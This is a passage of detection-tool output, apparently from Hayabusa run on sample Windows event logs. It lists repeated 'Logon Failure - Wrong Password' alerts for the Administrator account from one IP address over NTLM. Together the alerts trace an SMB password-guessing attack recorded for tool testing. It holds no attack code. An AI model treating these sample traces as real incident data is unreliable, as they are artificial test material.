NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: 